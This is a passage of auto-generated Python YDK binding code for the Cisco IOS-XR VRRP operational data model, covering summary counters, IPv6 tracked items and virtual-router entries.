**type**\: :py:class:`Summary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Summary>`
**config**\: False
.. attribute:: ipv6
IPv6 VRRP configuration
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6>`
**config**\: False
.. attribute:: ipv4
IPv4 VRRP configuration
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4>`
**config**\: False
.. attribute:: mgo_sessions
VRRP MGO Session information
**type**\: :py:class:`MgoSessions <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.MgoSessions>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp, self).__init__()
self._top_entity = None
self.yang_name = "vrrp"
self.yang_parent_name = "Cisco-IOS-XR-ipv4-vrrp-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary", ("summary", Vrrp.Summary)), ("ipv6", ("ipv6", Vrrp.Ipv6)), ("ipv4", ("ipv4", Vrrp.Ipv4)), ("mgo-sessions", ("mgo_sessions", Vrrp.MgoSessions))])
self._leafs = OrderedDict()
self.summary = Vrrp.Summary()
self.summary.parent = self
self._children_name_map["summary"] = "summary"
self.ipv6 = Vrrp.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self.ipv4 = Vrrp.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self.mgo_sessions = Vrrp.MgoSessions()
self.mgo_sessions.parent = self
self._children_name_map["mgo_sessions"] = "mgo-sessions"
self._segment_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp, [], name, value)
class Summary(_Entity_):
"""
VRRP summary statistics
.. attribute:: ipv4_sessions_master_owner
Number of IPv4 sessions in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_sessions_master
Number of IPv4 sessions in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_sessions_backup
Number of IPv4 sessions in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_sessions_init
Number of IPv4 sessions in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_slaves_master
Number of IPv4 slaves in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_slaves_backup
Number of IPv4 slaves in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_slaves_init
Number of IPv4 slaves in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_owner_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_owner_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_master_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_backup_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_backup_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_init_up
Number of UP IPv4 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv4_virtual_ip_addresses_init_down
Number of DOWN IPv4 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_master_owner
Number of IPv6 sessions in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_master
Number of IPv6 sessions in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_backup
Number of IPv6 sessions in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_sessions_init
Number of IPv6 sessions in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_slaves_master
Number of IPv6 slaves in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_slaves_backup
Number of IPv6 slaves in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_slaves_init
Number of IPv6 slaves in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_owner_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_owner_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in MASTER (owner) state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_master_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in MASTER state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_backup_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_backup_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in BACKUP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_init_up
Number of UP IPv6 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6_virtual_ip_addresses_init_down
Number of DOWN IPv6 Virtual IP Addresses on virtual routers in INIT state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv4_state_up
Number of VRRP interfaces with IPv4 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv4_state_down
Number of VRRP interfaces with IPv4 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv4_state_up
Number of tracked interfaces with IPv4 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv4_state_down
Number of tracked interfaces with IPv4 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv6_state_up
Number of VRRP interfaces with IPv6 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: interfaces_ipv6_state_down
Number of VRRP interfaces with IPv6 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv6_state_up
Number of tracked interfaces with IPv6 caps in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interfaces_ipv6_state_down
Number of tracked interfaces with IPv6 caps in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_objects_state_up
Number of tracked objects in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_objects_state_down
Number of tracked objects in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_sessions_up
Number of VRRP IPv4 BFD sessions in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_sessions_down
Number of VRRP IPv4 BFD sessions in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_session_inactive
Number of VRRP IPv4 BFD sessions in INACTIVE state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6bfd_sessions_up
Number of VRRP IPv6 BFD sessions in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6bfd_sessions_down
Number of VRRP IPv6 BFD sessions in DOWN state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ipv6bfd_session_inactive
Number of VRRP IPv6 BFD sessions in INACTIVE state
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Summary, self).__init__()
self.yang_name = "summary"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv4_sessions_master_owner', (YLeaf(YType.uint32, 'ipv4-sessions-master-owner'), ['int'])),
('ipv4_sessions_master', (YLeaf(YType.uint32, 'ipv4-sessions-master'), ['int'])),
('ipv4_sessions_backup', (YLeaf(YType.uint32, 'ipv4-sessions-backup'), ['int'])),
('ipv4_sessions_init', (YLeaf(YType.uint32, 'ipv4-sessions-init'), ['int'])),
('ipv4_slaves_master', (YLeaf(YType.uint32, 'ipv4-slaves-master'), ['int'])),
('ipv4_slaves_backup', (YLeaf(YType.uint32, 'ipv4-slaves-backup'), ['int'])),
('ipv4_slaves_init', (YLeaf(YType.uint32, 'ipv4-slaves-init'), ['int'])),
('ipv4_virtual_ip_addresses_master_owner_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-owner-up'), ['int'])),
('ipv4_virtual_ip_addresses_master_owner_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-owner-down'), ['int'])),
('ipv4_virtual_ip_addresses_master_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-up'), ['int'])),
('ipv4_virtual_ip_addresses_master_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-master-down'), ['int'])),
('ipv4_virtual_ip_addresses_backup_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-backup-up'), ['int'])),
('ipv4_virtual_ip_addresses_backup_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-backup-down'), ['int'])),
('ipv4_virtual_ip_addresses_init_up', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-init-up'), ['int'])),
('ipv4_virtual_ip_addresses_init_down', (YLeaf(YType.uint32, 'ipv4-virtual-ip-addresses-init-down'), ['int'])),
('ipv6_sessions_master_owner', (YLeaf(YType.uint32, 'ipv6-sessions-master-owner'), ['int'])),
('ipv6_sessions_master', (YLeaf(YType.uint32, 'ipv6-sessions-master'), ['int'])),
('ipv6_sessions_backup', (YLeaf(YType.uint32, 'ipv6-sessions-backup'), ['int'])),
('ipv6_sessions_init', (YLeaf(YType.uint32, 'ipv6-sessions-init'), ['int'])),
('ipv6_slaves_master', (YLeaf(YType.uint32, 'ipv6-slaves-master'), ['int'])),
('ipv6_slaves_backup', (YLeaf(YType.uint32, 'ipv6-slaves-backup'), ['int'])),
('ipv6_slaves_init', (YLeaf(YType.uint32, 'ipv6-slaves-init'), ['int'])),
('ipv6_virtual_ip_addresses_master_owner_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-owner-up'), ['int'])),
('ipv6_virtual_ip_addresses_master_owner_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-owner-down'), ['int'])),
('ipv6_virtual_ip_addresses_master_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-up'), ['int'])),
('ipv6_virtual_ip_addresses_master_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-master-down'), ['int'])),
('ipv6_virtual_ip_addresses_backup_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-backup-up'), ['int'])),
('ipv6_virtual_ip_addresses_backup_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-backup-down'), ['int'])),
('ipv6_virtual_ip_addresses_init_up', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-init-up'), ['int'])),
('ipv6_virtual_ip_addresses_init_down', (YLeaf(YType.uint32, 'ipv6-virtual-ip-addresses-init-down'), ['int'])),
('interfaces_ipv4_state_up', (YLeaf(YType.uint32, 'interfaces-ipv4-state-up'), ['int'])),
('interfaces_ipv4_state_down', (YLeaf(YType.uint32, 'interfaces-ipv4-state-down'), ['int'])),
('tracked_interfaces_ipv4_state_up', (YLeaf(YType.uint32, 'tracked-interfaces-ipv4-state-up'), ['int'])),
('tracked_interfaces_ipv4_state_down', (YLeaf(YType.uint32, 'tracked-interfaces-ipv4-state-down'), ['int'])),
('interfaces_ipv6_state_up', (YLeaf(YType.uint32, 'interfaces-ipv6-state-up'), ['int'])),
('interfaces_ipv6_state_down', (YLeaf(YType.uint32, 'interfaces-ipv6-state-down'), ['int'])),
('tracked_interfaces_ipv6_state_up', (YLeaf(YType.uint32, 'tracked-interfaces-ipv6-state-up'), ['int'])),
('tracked_interfaces_ipv6_state_down', (YLeaf(YType.uint32, 'tracked-interfaces-ipv6-state-down'), ['int'])),
('tracked_objects_state_up', (YLeaf(YType.uint32, 'tracked-objects-state-up'), ['int'])),
('tracked_objects_state_down', (YLeaf(YType.uint32, 'tracked-objects-state-down'), ['int'])),
('bfd_sessions_up', (YLeaf(YType.uint32, 'bfd-sessions-up'), ['int'])),
('bfd_sessions_down', (YLeaf(YType.uint32, 'bfd-sessions-down'), ['int'])),
('bfd_session_inactive', (YLeaf(YType.uint32, 'bfd-session-inactive'), ['int'])),
('ipv6bfd_sessions_up', (YLeaf(YType.uint32, 'ipv6bfd-sessions-up'), ['int'])),
('ipv6bfd_sessions_down', (YLeaf(YType.uint32, 'ipv6bfd-sessions-down'), ['int'])),
('ipv6bfd_session_inactive', (YLeaf(YType.uint32, 'ipv6bfd-session-inactive'), ['int'])),
])
self.ipv4_sessions_master_owner = None
self.ipv4_sessions_master = None
self.ipv4_sessions_backup = None
self.ipv4_sessions_init = None
self.ipv4_slaves_master = None
self.ipv4_slaves_backup = None
self.ipv4_slaves_init = None
self.ipv4_virtual_ip_addresses_master_owner_up = None
self.ipv4_virtual_ip_addresses_master_owner_down = None
self.ipv4_virtual_ip_addresses_master_up = None
self.ipv4_virtual_ip_addresses_master_down = None
self.ipv4_virtual_ip_addresses_backup_up = None
self.ipv4_virtual_ip_addresses_backup_down = None
self.ipv4_virtual_ip_addresses_init_up = None
self.ipv4_virtual_ip_addresses_init_down = None
self.ipv6_sessions_master_owner = None
self.ipv6_sessions_master = None
self.ipv6_sessions_backup = None
self.ipv6_sessions_init = None
self.ipv6_slaves_master = None
self.ipv6_slaves_backup = None
self.ipv6_slaves_init = None
self.ipv6_virtual_ip_addresses_master_owner_up = None
self.ipv6_virtual_ip_addresses_master_owner_down = None
self.ipv6_virtual_ip_addresses_master_up = None
self.ipv6_virtual_ip_addresses_master_down = None
self.ipv6_virtual_ip_addresses_backup_up = None
self.ipv6_virtual_ip_addresses_backup_down = None
self.ipv6_virtual_ip_addresses_init_up = None
self.ipv6_virtual_ip_addresses_init_down = None
self.interfaces_ipv4_state_up = None
self.interfaces_ipv4_state_down = None
self.tracked_interfaces_ipv4_state_up = None
self.tracked_interfaces_ipv4_state_down = None
self.interfaces_ipv6_state_up = None
self.interfaces_ipv6_state_down = None
self.tracked_interfaces_ipv6_state_up = None
self.tracked_interfaces_ipv6_state_down = None
self.tracked_objects_state_up = None
self.tracked_objects_state_down = None
self.bfd_sessions_up = None
self.bfd_sessions_down = None
self.bfd_session_inactive = None
self.ipv6bfd_sessions_up = None
self.ipv6bfd_sessions_down = None
self.ipv6bfd_session_inactive = None
self._segment_path = lambda: "summary"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Summary, ['ipv4_sessions_master_owner', 'ipv4_sessions_master', 'ipv4_sessions_backup', 'ipv4_sessions_init', 'ipv4_slaves_master', 'ipv4_slaves_backup', 'ipv4_slaves_init', 'ipv4_virtual_ip_addresses_master_owner_up', 'ipv4_virtual_ip_addresses_master_owner_down', 'ipv4_virtual_ip_addresses_master_up', 'ipv4_virtual_ip_addresses_master_down', 'ipv4_virtual_ip_addresses_backup_up', 'ipv4_virtual_ip_addresses_backup_down', 'ipv4_virtual_ip_addresses_init_up', 'ipv4_virtual_ip_addresses_init_down', 'ipv6_sessions_master_owner', 'ipv6_sessions_master', 'ipv6_sessions_backup', 'ipv6_sessions_init', 'ipv6_slaves_master', 'ipv6_slaves_backup', 'ipv6_slaves_init', 'ipv6_virtual_ip_addresses_master_owner_up', 'ipv6_virtual_ip_addresses_master_owner_down', 'ipv6_virtual_ip_addresses_master_up', 'ipv6_virtual_ip_addresses_master_down', 'ipv6_virtual_ip_addresses_backup_up', 'ipv6_virtual_ip_addresses_backup_down', 'ipv6_virtual_ip_addresses_init_up', 'ipv6_virtual_ip_addresses_init_down', 'interfaces_ipv4_state_up', 'interfaces_ipv4_state_down', 'tracked_interfaces_ipv4_state_up', 'tracked_interfaces_ipv4_state_down', 'interfaces_ipv6_state_up', 'interfaces_ipv6_state_down', 'tracked_interfaces_ipv6_state_up', 'tracked_interfaces_ipv6_state_down', 'tracked_objects_state_up', 'tracked_objects_state_down', 'bfd_sessions_up', 'bfd_sessions_down', 'bfd_session_inactive', 'ipv6bfd_sessions_up', 'ipv6bfd_sessions_down', 'ipv6bfd_session_inactive'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Summary']['meta_info']
class Ipv6(_Entity_):
"""
IPv6 VRRP configuration
.. attribute:: track_items
The VRRP tracked item table
**type**\: :py:class:`TrackItems <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.TrackItems>`
**config**\: False
.. attribute:: virtual_routers
The VRRP virtual router table
**type**\: :py:class:`VirtualRouters <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters>`
**config**\: False
.. attribute:: interfaces
The VRRP interface table
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.Interfaces>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "vrrp"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-items", ("track_items", Vrrp.Ipv6.TrackItems)), ("virtual-routers", ("virtual_routers", Vrrp.Ipv6.VirtualRouters)), ("interfaces", ("interfaces", Vrrp.Ipv6.Interfaces))])
self._leafs = OrderedDict()
self.track_items = Vrrp.Ipv6.TrackItems()
self.track_items.parent = self
self._children_name_map["track_items"] = "track-items"
self.virtual_routers = Vrrp.Ipv6.VirtualRouters()
self.virtual_routers.parent = self
self._children_name_map["virtual_routers"] = "virtual-routers"
self.interfaces = Vrrp.Ipv6.Interfaces()
self.interfaces.parent = self
self._children_name_map["interfaces"] = "interfaces"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6, [], name, value)
class TrackItems(_Entity_):
"""
The VRRP tracked item table
.. attribute:: track_item
A configured VRRP IP address entry
**type**\: list of :py:class:`TrackItem <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.TrackItems.TrackItem>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.TrackItems, self).__init__()
self.yang_name = "track-items"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-item", ("track_item", Vrrp.Ipv6.TrackItems.TrackItem))])
self._leafs = OrderedDict()
self.track_item = YList(self)
self._segment_path = lambda: "track-items"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.TrackItems, [], name, value)
class TrackItem(_Entity_):
"""
A configured VRRP IP address entry
.. attribute:: interface_name (key)
The interface name to track
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_name (key)
The name of the tracked interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.TrackItems.TrackItem, self).__init__()
self.yang_name = "track-item"
self.yang_parent_name = "track-items"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id','tracked_interface_name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('tracked_interface_name', (YLeaf(YType.str, 'tracked-interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface_name = None
self.virtual_router_id = None
self.tracked_interface_name = None
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']" + "[tracked-interface-name='" + str(self.tracked_interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/track-items/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.TrackItems.TrackItem, ['interface_name', 'virtual_router_id', 'tracked_interface_name', 'interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.TrackItems.TrackItem']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.TrackItems']['meta_info']
class VirtualRouters(_Entity_):
"""
The VRRP virtual router table
.. attribute:: virtual_router
A VRRP virtual router
**type**\: list of :py:class:`VirtualRouter <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters, self).__init__()
self.yang_name = "virtual-routers"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("virtual-router", ("virtual_router", Vrrp.Ipv6.VirtualRouters.VirtualRouter))])
self._leafs = OrderedDict()
self.virtual_router = YList(self)
self._segment_path = lambda: "virtual-routers"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters, [], name, value)
class VirtualRouter(_Entity_):
"""
A VRRP virtual router
.. attribute:: interface_name (key)
The name of the interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id (key)
The VRRP virtual router id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: resign_sent_time
Time last resign was sent
**type**\: :py:class:`ResignSentTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime>`
**config**\: False
.. attribute:: resign_received_time
Time last resign was received
**type**\: :py:class:`ResignReceivedTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime>`
**config**\: False
.. attribute:: interface_name_xr
IM Interface Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: version
VRRP Protocol Version
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: address_family
Address family
**type**\: :py:class:`VrrpBAf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBAf>`
**config**\: False
.. attribute:: session_name
Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: slaves
Number of slaves following state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: is_slave
Group is a slave group
**type**\: bool
**config**\: False
.. attribute:: followed_session_name
Followed Session Name
**type**\: str
**length:** 0..16
**config**\: False
.. attribute:: secondary_address_count
Configured VRRP secondary address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_address_count
Operational VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: primary_virtual_ip
Configured IPv4 Primary address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: configured_down_address_count
Configured but Down VRRP address count
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: virtual_linklocal_ipv6_address
Virtual linklocal IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: primary_state
State of primary IP address
**type**\: :py:class:`VrrpVipState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVipState>`
**config**\: False
.. attribute:: master_ip_address
Master router real IP address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_ipv6_address
Master router real IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: master_priority
Master router priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: vrrp_state
VRRP state
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: authentication_type
Authentication type
